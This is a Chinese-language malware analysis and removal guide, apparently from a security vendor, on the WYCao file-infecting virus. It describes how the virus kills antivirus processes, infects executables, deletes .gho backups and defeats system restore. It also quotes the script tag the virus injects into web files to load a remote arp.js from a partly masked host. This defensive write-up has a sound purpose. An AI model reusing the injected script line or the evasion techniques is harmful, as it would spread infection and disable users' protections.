查杀explorer.exe,windows.txt,msdos.bat,zzz.sys病毒

根据我们蜜罐网络的监测,最近感染最多的木马病毒是以WYCao为代表的explorer.exe,windows.txt,msdos.bat,zzz.sys等病毒,

WYCao病毒技术分析:

1． 判断SYSTEM\\CurrentControlSet\\Services\\BITS在不在，在了继续运行，不再退出(可做免疫,不过该服务和autoupdata,相关联关闭对自动更新有影响)。
2． 复制自己到%windows%\tasks\0x01xx8p.exe，删除当前运行的母体。
3． 复制explorer.exe到%windows%\tasks\ sysfile.brk和explorer.ext,感染explorer.ext，新建一个.WYCao节将自己写入，并将感染的explorer.ext替换原来的explorer.exe。
4． 提升自己为SeDebugPrivilege权限，判断进程中有没有avp.exe kvsrvxp.exe kissvc.exe,发现了用OpenProcess TerminateProcess CloseHandle来结束，仅测试毒霸kissvc.exe不会被病毒结束。
5． 下载病毒配置文件http://xxxx.158dm.com/config.txt到C:\WINDOWS\ system32\ windows.txt
6． 将Down下的病毒下载地址放到HKEY_LOCAL_MACHINE\ SOFTWARE\ Data\ Config键值下，通过InternetOpenA来下载。
7． 将非系统文件夹下的所有.scr .com .cmd .bat .exe文件，新建一个.WYCao节将自己写入。感染所有的.do .htm .html .shtm .shtml .aspx .php .jsp .cgi .xml文件加入<script language="JavaScript" src=http://xxxx.158dm.com/one/arp.js></script>，删除所有的.gho文件。
8． 创建c:\ zzz.sys，并用SC来创建运行服务zzz，来突破还原系统，将感染的explorer.exe写入\\.\yyy2\windows\explorer.exe
9． 感染的PE文件先将病毒加密数据解密释放到%windows%/windows.ext文件，运行后删除，在跳到PE文件正常的OEP来运行，OEP并没有加密。

清除建议:

1.使用木马清除大师2008全面清除(http://www.lofocus.com/download)

2. 由于该病毒没有写启动项来运行病毒,也没有什么保护进程,所以可以在安全模式下,用任务管理器将explorer.exe结束掉.然后到文件--新建任务里输入C:\WINDOWS\system32\dllcache\explorer.exe 确定运行,然后复制C:\WINDOWS\system32\dllcache\explorer.exe到你的c:\windows\explorer.exe 删除原来